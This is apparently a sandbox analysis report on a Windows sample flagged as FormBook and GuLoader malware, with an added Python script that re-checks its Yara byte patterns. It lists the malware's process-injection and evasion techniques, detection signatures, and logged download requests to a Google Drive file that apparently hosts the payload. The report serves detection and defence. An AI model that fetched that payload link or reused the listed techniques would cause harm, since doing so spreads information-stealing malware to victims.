
Windows Analysis Report
PEDIDO-144797.exe

Overview

General Information

Sample name: PEDIDO-144797.exe
Analysis ID: 1525501
MD5: 2c5483106fe248cced82541b91cba20e
SHA1: 41e69017b26287ee7814bb35a967672ba58cb714
SHA256: 2702bb251c14965787b39f03a9c41000b9b0421528578e5a6a221ad8b27f182d

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • PEDIDO-144797.exe (PID: 8048, cmdline: "C:\Users\user\Desktop\PEDIDO-144797.exe", MD5: 2C5483106FE248CCED82541B91CBA20E)
    • PEDIDO-144797.exe (PID: 6780, cmdline: "C:\Users\user\Desktop\PEDIDO-144797.exe", MD5: 2C5483106FE248CCED82541B91CBA20E)
      • RAVCpl64.exe (PID: 6740, cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s, MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • SecEdit.exe (PID: 6980, cmdline: "C:\Windows\SysWOW64\SecEdit.exe", MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • explorer.exe (PID: 4912, cmdline: C:\Windows\Explorer.EXE, MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
No configs have been found
Yara matches (source, rule, description, author, strings)

Source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 - Yara detected FormBook (Joe Security)
  Rule: Windows_Trojan_Formbook_1112e116 (description and author unknown)
    • 0x2bf40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1400f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 - Yara detected FormBook (Joe Security)
  Rule: Windows_Trojan_Formbook_1112e116 (description and author unknown)
    • 0x2bf40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1400f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_FormBook_1 - Yara detected FormBook (Joe Security)
  (2 further entries not included in this export)
        No Sigma rule has matched
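The community rule hit is the strongest evidence on this page, so it is worth being able to reproduce it without the sandbox: the two hex strings it matched are printed above together with their offsets in the memory dump. The block below is an added example and not part of the Joe Sandbox report or of the Yara rule's own source: it checks a file against the SHA256 the report lists for the sample, then searches a dump for the two byte patterns exactly as printed above. The dump it scans is constructed (zero-filled, with the two patterns placed at the report's offsets), since the real 0x323D0000 region is not part of this page.

```python
"""Added example: re-check the Windows_Trojan_Formbook_1112e116 byte patterns
listed in the report against a memory dump with plain Python, after confirming
the sample's identity by hash.  Not the rule's source and not the report's code."""
import hashlib
import re

# Byte patterns exactly as listed in the report's Yara match section.
FORMBOOK_PATTERNS = {
    "$a2": bytes.fromhex("740A4E0FB6088D44080175F68D70010FB6008D55"),
    "$a3": bytes.fromhex("1AD280E2AF80C27EEB2A80FA2F75118AD080E201"),
}

# SHA256 of PEDIDO-144797.exe from the report's General Information table.
EXPECTED_SHA256 = "2702bb251c14965787b39f03a9c41000b9b0421528578e5a6a221ad8b27f182d"


def sample_matches_report(data: bytes) -> bool:
    """True if the bytes hash to the SHA256 the report lists for the sample."""
    return hashlib.sha256(data).hexdigest() == EXPECTED_SHA256


def scan_formbook_patterns(dump: bytes) -> dict:
    """Return {pattern_name: [offsets]} for every report-listed pattern in dump.

    re.escape on a bytes pattern gives a literal byte search, so the result is
    the same thing Yara reports for a plain hex string without wildcards.
    """
    hits = {}
    for name, pattern in FORMBOOK_PATTERNS.items():
        offsets = [m.start() for m in re.finditer(re.escape(pattern), dump)]
        if offsets:
            hits[name] = offsets
    return hits


def build_constructed_dump() -> bytes:
    """Constructed stand-in for the dumped region: zero-filled, with the two
    patterns placed at the offsets the report gives (0x1400f and 0x2bf40).
    This is test data, not the real memory dump."""
    size = 0x2bf40 + len(FORMBOOK_PATTERNS["$a2"]) + 0x100
    buf = bytearray(size)
    buf[0x1400f:0x1400f + len(FORMBOOK_PATTERNS["$a3"])] = FORMBOOK_PATTERNS["$a3"]
    buf[0x2bf40:0x2bf40 + len(FORMBOOK_PATTERNS["$a2"])] = FORMBOOK_PATTERNS["$a2"]
    return bytes(buf)


if __name__ == "__main__":
    for name, offs in sorted(scan_formbook_patterns(build_constructed_dump()).items()):
        print(name, [hex(o) for o in offs])
```

Against a real dump (for example a region written out by a debugger or by a sandbox), read the file in binary mode and pass it to scan_formbook_patterns; the offsets it returns should line up with the ones the rule reports. Note that the patterns are only found in the unpacked, in-memory payload: the report shows them in .sdmp memory regions, not in the on-disk NSIS installer, so a file-only scan of PEDIDO-144797.exe will not reproduce the hit.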
Suricata IDS alerts (timestamp, SID, severity, classtype, source, destination, protocol)

2024-10-04T10:50:43.162760+0200 | SID 2803270 | Severity 2 | Potentially Bad Traffic | 192.168.11.20:49732 -> 142.251.40.206:443 | TCP


        AV Detection

Source: PEDIDO-144797.exe | Avira: detected
Source: PEDIDO-144797.exe | ReversingLabs: Detection: 34%
Source: PEDIDO-144797.exe | Virustotal: Detection: 38%
Source: Yara match | File source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: PEDIDO-144797.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 142.251.40.206:443 -> 192.168.11.20:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.80.97:443 -> 192.168.11.20:49733 version: TLS 1.2
Source: PEDIDO-144797.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: SecEdit.pdb source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024BA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: SecEdit.pdbGCTL source: PEDIDO-144797.exe, 00000002.00000003.90053138743.00000000024BA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: PEDIDO-144797.exe, 00000002.00000003.90000854380.000000003231C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90004392454.00000000324C5000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90088339001.0000000002D10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90084646981.0000000002B63000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PEDIDO-144797.exe, PEDIDO-144797.exe, 00000002.00000003.90000854380.000000003231C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90004392454.00000000324C5000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, SecEdit.exe, 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90088339001.0000000002D10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000004.00000003.90084646981.0000000002B63000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function 0_2_004066F3: FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function 0_2_00405ABE: CloseHandle, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\PEDIDO-144797.exe | Code function 0_2_00402862: FindFirstFileW
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function 3_2_050C5FAA: 4x nop then mov ebx, 00000004h
Source: C:\Windows\SysWOW64\SecEdit.exe | Code function 4_2_02DD04DE: 4x nop then mov ebx, 00000004h
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49732 -> 142.251.40.206:443
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (seen twice)
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
        Source: explorer.exe, 00000005.00000002.94452918228.000000000D4A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565997400.000000000D4A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: explorer.exe, 00000005.00000002.94452918228.000000000D4A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565997400.000000000D4A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: PEDIDO-144797.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 00000005.00000002.94452918228.000000000D4A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565997400.000000000D4A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: explorer.exe, 00000005.00000000.91562314503.0000000009948000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94447093976.0000000009948000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl_
        Source: explorer.exe, 00000005.00000000.91563709105.000000000A9E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.91558832216.00000000032F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.94448609733.0000000009DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: PEDIDO-144797.exe, 00000002.00000003.89664710675.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: PEDIDO-144797.exe, 00000002.00000001.89609492793.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009864000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.92004096261.00000000098DB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
        Source: explorer.exe, 00000005.00000000.91561655678.00000000097EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.00000000097EF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=02bde011-1e9
        Source: explorer.exe, 00000005.00000000.91565423827.000000000D2F4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000005.00000002.94452035443.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565423827.000000000D2BF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DC09251A71C5472DA2BDFD73DC109609&timeOut=5000&oc
        Source: explorer.exe, 00000005.00000002.94452035443.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565423827.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: explorer.exe, 00000005.00000002.94447093976.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91562314503.00000000099B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.pn
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.sv
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.png
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svg
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W36_Most
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/WeatherInsight/W
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.f
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI-dark
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-dark
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark
        Source: PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002426000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90097431649.00000000319C0000.00000004.00001000.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi
        Source: PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYiY
        Source: PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYih
        Source: PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: PEDIDO-144797.exe, 00000002.00000003.89664993859.00000000024B9000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002051810.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957520135.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087203673.0000000002440000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957706436.0000000002440000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087441092.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002219442.0000000002440000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90053218520.0000000002471000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89696298899.0000000002471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi&export=download
        Source: PEDIDO-144797.exe, 00000002.00000003.89957706436.0000000002436000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002219442.0000000002436000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90001884355.0000000002436000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000002.90087203673.0000000002438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi&export=download(S
        Source: explorer.exe, 00000005.00000000.91567643029.000000000D9E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA179X84.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1g7bhz.img
        Source: explorer.exe, 00000005.00000002.94446111895.0000000009700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1gKAgr.&
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1lLvot.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009737000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94446111895.0000000009737000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1nsFzx.img
        Source: explorer.exe, 00000005.00000000.91561655678.0000000009700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA36Tom.img
